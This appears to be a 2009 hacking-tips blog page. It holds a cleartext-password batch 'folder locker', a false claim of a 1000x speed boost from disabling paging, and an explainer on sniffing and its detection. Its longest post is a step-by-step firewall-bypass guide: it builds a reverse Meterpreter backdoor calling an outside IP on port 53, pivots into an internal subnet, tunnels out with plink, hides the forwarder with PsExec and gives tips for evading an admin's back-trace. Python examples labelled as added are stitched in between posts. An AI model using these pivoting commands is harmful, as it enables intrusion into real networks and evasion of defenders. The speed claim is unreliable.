Thursday, February 19, 2009

Lock Your Folder Through Notepad

Using this technique you can not only lock your folder but also hide it.

Copy and paste the following code into Notepad:

cls
@ECHO OFF
title Folder Locker
rem If the renamed ("locked") folder already exists, offer to unlock it
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
rem If no Locker folder exists yet, create one
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder (Y/N)?
set /p "cho=>"
rem /i makes the comparison case-insensitive; quotes keep an empty answer from breaking the script
if /i "%cho%"=="Y" goto LOCK
if /i "%cho%"=="N" goto END
echo Invalid choice.
goto CONFIRM
:LOCK
rem "Locking" = renaming the folder to a Control Panel CLSID name and marking it hidden+system
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto END
:UNLOCK
echo Enter password to unlock folder
set /p "pass=>"
rem Replace "type your password here" with your password; the quotes are required if it contains spaces
if NOT "%pass%"=="type your password here" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder unlocked successfully
goto END
:FAIL
echo Invalid password
goto END
:MDLOCKER
md Locker
echo Locker created successfully
goto END
:END

Now do the following steps:

1. Copy the code above into Notepad.

2. Delete the text "type your password here" (shown in bold in the original) and type your own password in its place.

3. Save the file with a .bat extension (the name is your choice).

4. A .bat file now appears on your screen.

5. Double-click that file.

6. You will see the Locker folder.

7. Save your files in that folder.

8. Double-click the .bat file again and lock the folder.

9. After locking, the folder becomes hidden.

10. To open the folder, double-click the .bat file again.

11. Type your password and open the folder.
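As an added example (not part of the original post), the following Python script audits a directory for the artefacts this trick leaves behind. It makes the security point concrete: the "lock" is only a rename to a Control Panel CLSID name plus hidden/system attributes, and the password is compared in cleartext inside the .bat, so anyone who can read the script or show hidden files can open the folder. The sample directory and the locker script it writes are constructed for the demo; the function names are this example's own.

```python
import os
import re
import tempfile
from pathlib import Path

# The CLSID the batch file appends to disguise the folder as "Control Panel".
LOCKER_CLSID = "{21EC2020-3AEA-1069-A2DD-08002B30309D}"

# Matches the password comparison line of the locker script, quoted or not:
#   if NOT %pass%==secret goto FAIL
#   if NOT "%pass%"=="my secret" goto FAIL
PASS_LINE = re.compile(
    r'if\s+NOT\s+"?%pass%"?=="?(?P<pw>.+?)"?\s+goto\s+FAIL',
    re.IGNORECASE,
)


def find_locker_password(bat_text):
    """Return the cleartext password embedded in a folder-locker .bat, or None."""
    m = PASS_LINE.search(bat_text)
    return m.group("pw") if m else None


def audit_folder_locker(root):
    """Walk `root` and report locker artefacts: disguised folders and .bat
    files whose password can be read straight out of the script."""
    findings = {"disguised_folders": [], "cleartext_passwords": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d.endswith(LOCKER_CLSID):
                findings["disguised_folders"].append(os.path.join(dirpath, d))
        for f in filenames:
            if f.lower().endswith(".bat"):
                path = os.path.join(dirpath, f)
                pw = find_locker_password(Path(path).read_text(errors="replace"))
                if pw is not None:
                    findings["cleartext_passwords"].append((path, pw))
    return findings


def demo():
    """Build a constructed sample directory (a 'locked' folder plus the
    locker script with a made-up password) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.mkdir(os.path.join(tmp, "Control Panel." + LOCKER_CLSID))
        Path(tmp, "locker.bat").write_text(
            '@ECHO OFF\nset /p "pass=>"\n'
            'if NOT "%pass%"=="hunter2" goto FAIL\n'
        )
        return audit_folder_locker(tmp)


if __name__ == "__main__":
    print(demo())
```

Run it against any directory with `audit_folder_locker(path)`; on Windows the renamed folder additionally carries the hidden and system attributes, which `attrib` or Explorer's "show hidden files" setting reveals just as easily.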

Boost Your Computer Speed 1000 Times



Step 1.

Theoretically this tweak boosts your computer speed 1000 times, but in practice it boosts it 10 to 20 times.

First click Start -> Run, open Notepad, type or paste the code below, and save it as DisablePagingExecutive.reg (.reg extension). Double-click the file; a prompt asks whether you want to add the information to the registry; click Yes.


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"DisablePagingExecutive"=dword:00000000


If you want to revert the changes, open Notepad, type or paste the code below, and save it as DisablePagingExecutive.reg (.reg extension). Double-click the file; when the prompt asks whether to add the information to the registry, click Yes.


Or just change the dword value from 0 to 1 in the first file.


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"DisablePagingExecutive"=dword:00000001



Step 2.

(See the screenshot)
Go to the desktop, right-click My Computer and select Properties -> Advanced -> Settings -> Advanced -> Change. The Virtual Memory dialog opens; select No paging file, click Set, then click OK. Now you are all done, but don't forget Step 2, as it is mandatory.

Monday, February 16, 2009

What is Sniffer and how to detect sniffing in computer network

Sniffing is the electronic form of eavesdropping on the communications that computers transmit across networks. In early networks, the equipment that connected machines allowed every machine on the network to see the traffic of all the others. These devices, repeaters and hubs, were very successful at connecting machines, but gave an attacker easy access to all traffic on the network, because the attacker only needed to connect to one point to see the entire network's traffic.


Sniffing is one of the most effective techniques for attacking a wireless network, whether the goal is mapping the network to gain information, grabbing passwords, or capturing unencrypted data.


Sniffing is a powerful tool in the hands of a hacker. Sniffers usually act as network probes or snoops, examining network traffic but not intercepting or altering it.


How does a Sniffer work?

Once a hacker has found possible networks to attack, one of their first tasks is to identify the target. Many organizations are nice enough to include their names or addresses in the network name.


A sniffer program works by asking the computer, specifically its Network Interface Card (NIC), to stop ignoring traffic addressed to other computers and pay attention to it. It does this by placing the NIC in a state known as promiscuous mode.

 
Once a NIC is in promiscuous mode, the machine can see all the data transmitted on its segment. The program then continuously reads all information entering the PC through the network card.


Data traveling along the network comes as frames, or packets: bursts of bits formatted according to specific protocols. Because of this strict formatting, the sniffer can peel away the layers of encapsulation and decode the relevant information stored in the packet, including the identity of the source computer, that of the targeted computer, and every piece of information exchanged between the two computers.



Even if the network administrator has configured the equipment to hide this information, tools are available that can determine it. Using any well-known network sniffing tool, an attacker can easily monitor an unencrypted network.


Protocols Vulnerable to Sniffing:


Telnet and Rlogin: With sniffing, a user's keystrokes can be captured as they are typed, including the username and password. Some tools capture all the text and dump it into a terminal emulator, which can reconstruct exactly what the end user is seeing, producing a real-time view of the remote user's screen.


HTTP: The default version of HTTP has many loopholes. Basic authentication, used by many websites, sends passwords across the wire in plain text; many sites prompt the user for a username and password and then send them across the network unencrypted. All data is sent in clear text.


SNMP: SNMPv1 traffic has no real security. SNMP passwords are sent in clear text across the network.


NNTP: Passwords and data are sent in the clear text across the network.


POP: Passwords and data are sent in the clear text across the network.


FTP: Passwords and data are sent in the clear text across the network.


IMAP: Passwords and data are sent in the clear text across the network.


Passive Vs. Active Sniffing

Sniffers are a powerful piece of software. They have the capability to place the hosting system’s network card into promiscuous mode. A network card in promiscuous mode can receive all the data it can see, not just packets addressed to it.



Passive Sniffing

If you are on a hub, a lot of traffic can potentially be affected. Hubs see all the traffic in that particular collision domain. Sniffing performed on a hub is known as passive sniffing.


Passive sniffing is performed when the user is on a hub. Because the user is on a hub, all traffic is sent to all ports. All the attacker must do is to start the sniffer and just wait for someone on the same collision domain to start sending or receiving data. Collision domain is a logical area of the network in which one or more data packets can collide with each other.


Passive sniffing worked well during the days that hubs were used. The problem is that there are few of these devices left. Most modern networks use switches. That is where active sniffing comes in.


Active Sniffing

When sniffing is performed on a switched network, it is known as active sniffing.


Active sniffing relies on injecting packets into the network that causes traffic. Active sniffing is required to bypass the segmentation that switches provided. Switches maintain their own ARP cache in a special type of memory known as Content Addressable Memory (CAM), keeping track of which host is connected to which port.


Sniffers operate at the Data Link layer of the OSI model. This means that they do not have to play by the same rules as applications and services that reside further up the stack. Sniffers can grab whatever they see on the wire and record it for later review. They allow the user to see all the data contained in the packet, even information that should remain hidden.


The terms active and passive sniffing have also been used to describe wireless network sniffing, with analogous meanings. Passive wireless sniffing involves sending no packets and only monitoring the packets sent by others; active sniffing involves sending out network probes to identify APs.


Protecting Against Sniffing & Eavesdropping

Wired networks have since moved from repeaters and hubs to switched environments. A switch sends only the traffic intended for a specific host over each individual port, making it difficult to sniff the entire network's traffic. Unfortunately this is not an option for wireless networks, due to the nature of wireless communications.


The only way to protect wireless users from attackers who might be sniffing is to utilize encrypted sessions wherever possible:

SSL for e-mail connection, SSH instead of Telnet, and Secure Copy (SCP) instead of File Transfer Protocol (FTP).



To protect a network from being discovered with sniffing tools, it is important to turn off any network identification broadcasts and if possible, close down the network to any unauthorized users.


Detecting a Sniffer


Sniffers are a major source of contemporary attacks. The "ifconfig" command can be used to detect whether a sniffer has been installed.


The “ifconfig” command displays the current configuration of your network interface. Most Ethernet adaptors are configured to accept only messages intended for them. An attacker must set a computer’s adaptor to “promiscuous mode,” in order to listen to (and record) everything on its segment of the Ethernet.


Antisniff scans networks to determine whether any NICs are running in promiscuous mode. Such detection tools should run regularly, since they act as an alarm of sorts, triggered by evidence of a sniffer.


Promqry 1.0, developed by Tim Rains at Microsoft, can be used to identify sniffers. According to Tim Rains, many network sniffer detection tools rely on bugs in the operating system and on sniffer behavior for their discovery work. Promqry is different in that it queries systems to learn whether any have a network interface operating in promiscuous mode, which, as you know, is a mode commonly used by network sniffing software. A command-line version and a GUI version of Promqry 1.0 are available at Microsoft's site.
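As an added example (not from the post), here is a small Python script that puts the "ifconfig" check described above into code: it parses ifconfig output for the PROMISC flag and, on a Linux host, reads the IFF_PROMISC bit directly from the kernel's /sys/class/net/<iface>/flags file. The ifconfig text is a constructed sample; the function names are this example's own.

```python
import os
import re

# IFF_PROMISC bit from the Linux interface flags; exposed in /sys/class/net/<iface>/flags.
IFF_PROMISC = 0x100

# Constructed sample `ifconfig` output (net-tools style): eth0 is promiscuous, lo is not.
SAMPLE_IFCONFIG = """\
eth0: flags=4419<UP,BROADCAST,RUNNING,PROMISC,MULTICAST>  mtu 1500
        inet 192.0.2.10  netmask 255.255.255.0  broadcast 192.0.2.255
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
"""

# Interface header line: "<name>: flags=<number><FLAG,FLAG,...>"
IFACE_LINE = re.compile(r"^(?P<name>\S+):\s+flags=\d+<(?P<flags>[^>]*)>", re.MULTILINE)


def promisc_from_ifconfig(text):
    """Names of interfaces whose ifconfig flag list contains PROMISC."""
    return [m.group("name") for m in IFACE_LINE.finditer(text)
            if "PROMISC" in m.group("flags").split(",")]


def promisc_from_flags(flags_by_iface):
    """Same check from the numeric flags word (hex string, as sysfs prints it)."""
    return [name for name, raw in flags_by_iface.items()
            if int(raw, 16) & IFF_PROMISC]


def read_sysfs_flags():
    """Read live interface flags on a Linux host; empty dict on other platforms."""
    base = "/sys/class/net"
    flags = {}
    if not os.path.isdir(base):
        return flags
    for name in os.listdir(base):
        try:
            with open(os.path.join(base, name, "flags")) as fh:
                flags[name] = fh.read().strip()
        except OSError:
            continue
    return flags


def check_local_host():
    """Report promiscuous interfaces on this machine via the sysfs path."""
    return promisc_from_flags(read_sysfs_flags())


if __name__ == "__main__":
    print("sample ifconfig:", promisc_from_ifconfig(SAMPLE_IFCONFIG))
    print("this host:", check_local_host())
```

Both checks ask the host about itself, so they only catch a sniffer that has not also tampered with the tools or kernel on that host; that is the reason the post also points at tools such as Antisniff and Promqry, which query systems from elsewhere on the network.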

Saturday, February 14, 2009

Bypassing Firewalls Using Metasploit & Port Forwarding

Many times during a penetration test, pen testers face a great problem when trying to gain access (legally) to internal network systems and services after beginning the attack from outside the secure boundary of the target network: the rule-sets of a firewall.



I assume that you have already gained access to at least one host which is linked to the internal network; you know there are many other systems inside, and certainly many interesting services you would like to play with :D.


The only problem is that you cannot access them through the internet, and the shell you have gained is not powerful enough to let you do all of your post-exploitation tasks through it. So you need a way to get rid of this limitation and freely browse and probe the internal network. So-called reverse shells may be your first try, but they are usually too simple and not powerful enough for what we're going to do.


We will review some effective ways of doing so in different situations. As a network administrator, you will see how opening even a single port in your outbound ACL can put your whole internal network at severe risk; we will learn that too.

 
So first of all, we will learn what port forwarding is.

Consider host A, host B in the middle, and host C. Host A should connect to host C in order to do something, but for some reason it's not possible, while host B can connect directly to C. If we use host B in the middle to take the connection stream from A and pass it on to C, while taking care of the connection, we say host B is doing port forwarding. Assuming the whole forwarding is happening to gain access to SSH on host C, this is how it happens from the TCP/IP point of view:


Host B runs a piece of software/service/wrapper that opens a listening socket (22/tcp in the example below) and waits for incoming connections. Host C (the real SSH server) is also listening on 22/tcp. The software running on B is configured to pass any incoming connection on the opened port to host C on port 22/tcp. So if host A connects to 22/tcp on B, the packets sent to this port are automatically relayed to C, port 22/tcp.

Like many other terms used in attacks, port forwarding is divided into normal port forwarding and reverse (remote) port forwarding. The A, B, C sample above was the normal one.

In reverse port forwarding, the case is again preparing a connection between A and C through B, but this time it's C who begins the connection. In a flat network design both of these can be the same, but if you place host A on the internet, host C in the deeply protected zones of the internal network, and host B at the border of the protected network, things change a little bit.

Fpipe, WinRelay and DataPipe.exe are three freeware, easy-to-use tools designed to do simple port forwarding. Let's use fpipe.exe to implement the scenario mentioned above and then quickly move to more advanced techniques. We run fpipe.exe with the parameters below on host B, and host A then has to SSH to host B. fpipe.exe handles the incoming connection (-l 22) and passes it to the remote host and defined port (-r 22 host-C). Nothing strange, and quite easy to understand.



fpipe.exe -l 22 -r 22 host-C
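To show what a tool like fpipe.exe actually does on host B, here is an added example in Python (not the post's code, nor fpipe's): a minimal TCP relay that listens on one port and copies bytes in both directions to a remote host and port, exactly the A -> B -> C path described above. In the demo all three hosts are loopback sockets and host C is a constructed echo service, so it runs offline; the class and function names are this example's own. The same relay is the thing an outbound ACL on B is meant to make impossible, which is why one open port there matters so much.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src reaches EOF, then tear both down."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            s.close()


class PortForwarder:
    """Host B's role: accept TCP connections on (listen_host, listen_port) and
    relay each one to (remote_host, remote_port), like `fpipe -l ... -r ...`."""

    def __init__(self, listen_host, listen_port, remote_host, remote_port):
        self.remote = (remote_host, remote_port)
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server.bind((listen_host, listen_port))
        self.server.listen(16)
        self.port = self.server.getsockname()[1]  # actual port (listen_port may be 0)
        self.thread = threading.Thread(target=self._accept_loop, daemon=True)

    def start(self):
        self.thread.start()
        return self

    def stop(self):
        self.server.close()  # makes accept() fail and the loop exit

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.server.accept()
            except OSError:
                return
            try:
                upstream = socket.create_connection(self.remote, timeout=5)
            except OSError:
                client.close()  # host C unreachable: drop A's connection
                continue
            upstream.settimeout(None)
            # One thread per direction: A -> C and C -> A.
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()


def start_echo_server():
    """Constructed stand-in for host C's service: echoes whatever it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv


def demo(payload=b"hello from host A, via host B"):
    """Host A connects to B's forwarded port and receives C's echo back."""
    host_c = start_echo_server()
    host_b = PortForwarder("127.0.0.1", 0, *host_c.getsockname()).start()
    got = b""
    with socket.create_connection(("127.0.0.1", host_b.port), timeout=5) as host_a:
        host_a.sendall(payload)
        while len(got) < len(payload):
            chunk = host_a.recv(4096)
            if not chunk:
                break
            got += chunk
    host_b.stop()
    host_c.close()
    return got


if __name__ == "__main__":
    print(demo())
```

`PortForwarder("0.0.0.0", 22, "host-C", 22)` is the Python equivalent of the fpipe command above; the demo binds port 0 so the OS picks a free port and nothing privileged is needed.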


So, let's make the scenario more real-world. What if even host B is behind a firewall and there is no chance to open any port? What if we can't even send a single packet to host B, while host B is the only system in the network which is allowed to connect to C? Oh, this looks like a hard scenario, but in fact it's not really so hard. In this scenario it's also assumed that host C (the final destination) is not allowed to send any packet to the internet, but host B is allowed to send packets to the internet, only if the destination port is 53. I don't mind how you may have compromised host B at all; you may have done so by exploiting a client-side vulnerability on it and got your reverse shell back in response.


In such a situation, tools like fpipe.exe will not help you much. Since we already have a negotiated connection between A and B, we should use it in the most effective way, because if we lose this connection before stabilizing our access (with a reverse-connecting trojan, for example), we have to re-exploit the target, which is not always possible.


For win32 targets, my favorite tool-set to bypass the firewall and get into the internal network is Metasploit with Meterpreter loaded as the exploit payload. Even if we are not using one of the MSF exploits to gain access, we can use 'msfpayload' within the framework to generate a raw binary output of Meterpreter and use it as a single executable trojan.


What makes Meterpreter a great post-exploitation tool for this case is its port-forwarding capability. It's great because:
  • Meterpreter does NOT open any new connection between you (host A) and B besides its negotiated session; all new communication channels are encapsulated in the current session.
  • You can define multiple forwarding rules over a single Meterpreter session.
  • You can view/add/remove forwarding rules as you go while it's running.
  • You can do many other things with Meterpreter while port forwarding is handled in the background.
  • Finally, you can directly exploit host C if Meterpreter is used within the framework, like when it's loaded after successfully exploiting something.

    If you just want the benefits of Meterpreter and have your own exploit ready, here's how to generate the executable payload to be executed on host B:


    msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=1.2.3.4 EXITFUNC=thread X > met-reverse-backdoor.exe


    I think the syntax is clear enough. LHOST is the IP of host A, where the backdoor will connect to; LPORT is the port on host A the backdoor connects to. I used 53 because this port is usually not filtered on firewalls. Now transfer met-reverse-backdoor.exe to host B and get ready to execute it.


    Since this is not a normal payload but an advanced multi-stage payload, we should use its specific handler/client, which is available in Metasploit. Let's run the Meterpreter handler. Launch the Metasploit console and then:

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LPORT 53
    LPORT => 53
    msf exploit(handler) > exploit
    [*] Started reverse handler
    [*] Starting the payload handler...



    Now you're ready to execute the built .exe on host B. After that, you will see the incoming connection on the console; let the payload load completely and announce the opened session.

    'portfwd' is the Meterpreter command we will work with. Try it without any parameters to get help, and read the Meterpreter documentation for further info and details.

    Let's assume we want to connect to the terminal service on host C directly from host A. With Meterpreter's port forwarding it's a matter of one command. In the Meterpreter console run:

    portfwd -a -L 127.0.0.1 -l 444 -h {IP of host C here} -p 3389


    Let me explain the above command if it's not clear.

    (-a) adds a new port-forwarding rule.

    (-L) defines the IP address to bind the forwarded socket to. Since we are running all of this on host A and want to continue working from the same host, we set 127.0.0.1. If host A has multiple IPs and you want to bind to a specific one, set it here.

    (-l) is the port number which will be opened on host A for accepting incoming connections. It can be any free port on your system.

    (-h) defines the IP address of host C, or any other host within the internal network.

    (-p) is the port you want to connect to on host C. Since we are going to use the terminal service, it's 3389.

    Now on host A, try to connect to the terminal service through the forwarded socket. To do so from the console:

    c:\>mstsc.exe /v:127.0.0.1:444

    Congratulations. You've successfully bypassed the firewall and got your reverse-connection terminal service session.

    The same steps can be used for almost any TCP service. Unfortunately UDP services are not supported in Meterpreter.

    But yes, we mentioned directly exploiting internal hosts from host A. Does it mean that for every service we are going to exploit we should define a forwarding rule? No.


    Metasploit has a nifty option (command) called 'route'. While you're in a Meterpreter session, if you ask for help you'll see a 'route' command, but that is not the one we want. After the Meterpreter session has loaded successfully (the first opened session will be named '1'), press Ctrl-Z in the console. This will get you back to the Metasploit console while keeping the Meterpreter session open in the background.
    Run the command below to confirm the session is available:


    msf exploit(handler) > sessions -l

    Active sessions
    ===============

    Id  Description  Tunnel
    --  -----------  ------
    1   Meterpreter  127.0.0.1:53 -> 1.2.3.4:1913


    Now type 'route' and check the given help for the syntax. Yes, this is what I was talking about.


    msf exploit(handler) > route
    Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

    Route traffic destined to a given subnet through a supplied session.
    The default comm is Local.

    Our targeted internal network uses 10.10.0.1/24 addressing. Host C's internal IP is 10.10.0.5, and we want to exploit host D with IP address 10.10.0.6. The lame way is to define a port-forwarding rule in Meterpreter and send the exploit payload to 127.0.0.1:{defined port}, as we did for the terminal service. The better way is to use 'route':


    msf exploit(handler) > route add 10.10.0.1 255.255.255.0 1

    msf exploit(handler) > route print

    Active Routing Table
    ====================

    Subnet     Netmask        Gateway
    ------     -------        -------
    10.10.0.1  255.255.255.0  Session 1

    msf exploit(handler) >



    The above means we've successfully added the route. What does it mean to Metasploit?
    It means that any time you set RHOST in any exploit in the framework to an address matching this routing rule, the exploit traffic will be routed automatically by Meterpreter to its destination network, transparently. Now to exploit 10.10.0.6 (host D), all you have to do is 'set RHOST 10.10.0.6' in the framework. All greetz go to HD Moore and Skape for preparing such an awesome framework :)



    Two other third-party tools that we have used are mentioned below:

    SocketNinja.pl is an old part of the Metasploit 2.x branch and a pretty useful tool for this purpose IMO. You can get it from here, and read more about it here. It was my favorite pivoting tool for a while.


    Reverse Proxy Multi-threading Engine by the Team 514 guys, which can be thought of as a stand-alone clone of Meterpreter port forwarding. While a pretty cool and powerful tool, I didn't find the code-base stable enough for hardcore work or heavy-duty jobs, and the code needs optimization. Test it in your lab before using it in real-world missions.



    Port-Forwarding Second Part

    In this part we will explain how to do the port-forwarding trick with SSH, without any special third-party tool but the SSH client.


    We have talked about what port forwarding is and how we can use simple tools to do it. Then we introduced some interesting features of Metasploit and its Meterpreter payload to implement port forwarding in a more advanced way, and finally how to use the pivoting capabilities of Metasploit.


    This time I'm going to discuss the same concept, but using ordinary operating-system capabilities and a few non-hacker-specific tools like an SSH server/client.

    If you remember part 1, we used a raw Meterpreter payload (an executable) to connect a host within the internal protected network to our host on the internet, and piggy-backed on that connection to jump into the firewalled network. While that feature of Meterpreter looks exciting, it's a hacker-friendly clone of a well-known SSH feature with the same name, 'port forwarding'. However, in order to use SSH the same way as Meterpreter, we should use another option known as 'remote port forwarding', or what we called 'reverse' port forwarding. Let's see how these two work. Before beginning, remember the same A, B, C host example, where:


    Normal port forwarding with SSH: This is the well-known option. It means we use an SSH server installed on host B to connect to host C or any other internal host. In this scenario, at least one dual-homed SSH server should exist in the protected network; dual-homed means B's SSH daemon should be accessible from the internet and able to reach the internal network too.
    Here's how we use SSH clients/servers to implement it. I usually use the PuTTY package as the SSH client for Windows. When the only use is port forwarding, I use plink.exe from this package, for reasons you'll learn later. I'll follow the same terminal-service example: host C runs TS and we want host B to forward us to it:


    On host A: plink.exe {host-B} -P 22 -C -L 127.0.0.1:444:{host-C}:3389 -l username -pw password

    Where: {host-B} -P 22 are the IP and port of SSH on the host located at the border of the network. -C forces compression; in most cases a great performance increase, but if you only forward binary or already-compressed protocols, skip it.

    -L 127.0.0.1:444:{host-C}:3389 means we want normal port forwarding (-L). The first part, 127.0.0.1:444, says that the start point of the tunnel will be bound to the 127.0.0.1 interface on our host (A) and listen on port 444, so everything sent to 127.0.0.1:444 will be forwarded to the end of the tunnel. The second part, {host-C}:3389, is the end point of the tunnel, where our forwarded data will be sent; since we want to connect to the terminal service on host C, we used that. Mentioning '127.0.0.1' is optional and you can skip it, unless you want to bind the socket to a specific interface on your system, in which case you should use the IP of that interface.

    -l and -pw are obvious, and they are the main reason we use plink.exe rather than putty.exe or any other common client: plink.exe accepts user/pass as switches but other clients do not. When you must launch the forwarder in the background or don't have interactive shell access, this is pretty useful, because other clients require an interactive shell to enter the password, unless you use certificate-based authentication, which has its own problems.


    After successful negotiation, you can use the same 'mstsc.exe /v:127.0.0.1:444' to connect to TS on host C. That's it.


    There's another way to do normal port forwarding with SSH too, and that's dynamic forwarding. Dynamic port forwarding is nothing but a SOCKS v4 proxy over the SSH session. It means you use the SSH server as a SOCKS server to browse internal network hosts. This is pretty useful when you simply want to browse web pages hosted there; of course SOCKS-enabled programs can be used with this too. Here's how to start it:


    plink.exe {host-B} -P 22 -C -D 8888 -l username -pw password


    -D starts the dynamic port forwarding feature, AKA SOCKS. The above makes your SSH client a simple SOCKS server listening on port 8888 for incoming connections. Nothing complex to explain.
    To learn more about SSH port forwarding, you can read this.


    Remote port forwarding: This is the cooler feature, and what we're actually going to use. Since it's not usually possible to find an open SSH server on the target network (unless it's a lame target), normal forwarding would not be a possible scenario. Here's where 'remote' port forwarding comes in handy. I'm not going to re-document this feature of SSH; you can ask Google for details. But I'll briefly explain how it should be used in our case, along with a few important notes and tricks.

    In remote port forwarding, the start point of the tunnel is on the SSH server rather than on the client, and the end of the tunnel is the host running the SSH client. In other words, in this scenario host B runs the SSH client and connects to an SSH server outside the protected network. Then a port is opened on the SSH server, and anything sent to the SSH server on that port is forwarded to the specified destination (host C in our case).

    Notice the difference? Yes: this way the attacker does not need to be able to SSH to any host in the protected network. No SSH server in the protected network is even necessary. All we have to be able to execute inside the protected network is an SSH client, plink.exe for example. Let's try this:


    We are assuming that:
    • We have an SSH server under our control, running on our own host {host-A} or any server on the internet.
    • The SSH server is configured to allow remote port forwarding. This is the case only for OpenSSH running on *nix.
    • We have prepared an account which is permitted to do 'remote' port forwarding. Usually only high-privileged users (root) have this.
    • At least one host (host B) in the protected network has at least one open port in the firewall ACL to be able to connect to servers outside the network. Wise admins usually block all outgoing connections, so 53 may be your lucky number again.
    • The SSH server is listening on that same port. So if only 53/tcp is allowed outgoing, our SSH server should be listening on 53.

    We'll run the command below on host B:


    plink.exe {host-A} -P 53 -C -R 127.0.0.1:444:{host-C}:3389 -l username -pw password


    -R 127.0.0.1:444:{host-C}:3389 is the switch that starts remote forwarding, where the first part (127.0.0.1:444) specifies the start point of the tunnel and the second part ({host-C}:3389) represents the end point. If you want to connect to the tunnel entry point (port 444) on the same host as the SSH server, you can again skip 127.0.0.1:444 and use '-R 444:{host-C}:3389'. If the SSH server is running on another host, say a zombie host, you should specify exactly the IP address of the interface you want to bind the socket to. So if the SSH server is running on 1.2.3.4, you should use '-R 1.2.3.4:444:{host-C}:3389'.

    Another important note is that, by default, the SSH server accepts connections to the remote forwarded port (444) only from localhost. So check the configuration of your client/server on how to set that up correctly. In putty.exe this is specified with a check mark (shown in the original screenshot). RTFM for how to do this on your favorite SSH client.

    With the above option allowed, you can now remotely connect to the SSH server on port 444 and get redirected into the internal network, to host C on port 3389. Without that option, it would be possible to connect to port 444 only from the same host as the SSH server. That's it! Welcome to the internal network.

    A few other tips:
    It's not necessary to have a dedicated server for launching the SSH server. If you're running Linux, all you have to do is configure and start sshd. If you're running Windows, you can get a copy of Bitvise WinSSHD and set it up.




    Since you're leaving the user/pass of your SSH server on the targeted host, be warned that you're leaking a high-privilege account there! So, disable the shell for that specific account, so that if a smart admin tries to back-trace you, he won't be able to instantly own your box. I've seen this really happen. Changing the password of that account after each connection is another solution BESIDES this.



    To run the forwarder (SSH client, plink.exe for example) in the background, you can use PsExec to execute it hidden in the background with system privileges so it's not killed by the user:


    psexec.exe -s -d plink.exe "plink parameters here"



    I hope you guys have learned a bit from this technique :), comments are welcome.

    Ethical Hacking through Windows XP for Computer Security


    Part I: The Magic of DOS
    In this guide you will learn how to telnet , forge email, use
    nslookup and netcat with Windows XP.
    So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users?
    ****************
    Luser Alert: Anyone who thinks this GTMHH will reveal how to blow up people's TV sets and steal Sandra Bullock's email is going to find out that I won't tell them how.
    ****************
    The key to doing amazing things with XP is as simple as D O S. Yes, that's right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS version. Various versions of command.com come with Windows 95, 98, SE, ME, Window 3, and DOS only operating systems.
    The other DOS, which comes only with the XP, 2000 and NT operating systems, is cmd.exe. Usually cmd.exe is better than command.com because it is easier to use, has more commands, and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For example, you can repeat a command by using the up arrow until you back up to the desired command. Unlike bash, however, your DOS command history is erased whenever you shut down cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won't run right in cmd.exe will work in command.com.
    ****************
    Flame Alert: Some readers are throwing fits because I dared to compare DOS to bash. I can compare cmd.exe to bash if I want to. Nanny nanny nah nah.
    ****************
    DOS is your number one Windows gateway to the Internet, and the open sesame to local area networks. From DOS, without needing to download a single hacker program, you can do amazingly sophisticated explorations and even break into poorly defended computers.
    ****************
    You can go to jail warning: Breaking into computers is against the law if you do not have permission to do so from the owner of that computer. For example, if your friend gives you permission to break into her Hotmail account, that won't protect you because Microsoft owns Hotmail and they will never give you permission.
    ****************
    ****************
    You can get expelled warning: Some kids have been kicked out of school just for bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before demonstrating that you can hack on a school computer.
    ****************
    So how do you turn on DOS?
    Click All Programs -> Accessories -> Command Prompt
    That runs cmd.exe. You should see a black screen with white text on it, saying something like this:
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\>
    Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS prompt, it gives you a long list of commands. However, this list leaves out all the commands hackers love to use. Here are some of those left out hacker commands.
    TCP/IP commands:
    telnet
    netstat
    nslookup
    tracert
    ping
    ftp
    NetBIOS commands (just some examples):
    nbtstat
    net use
    net view
    net localgroup
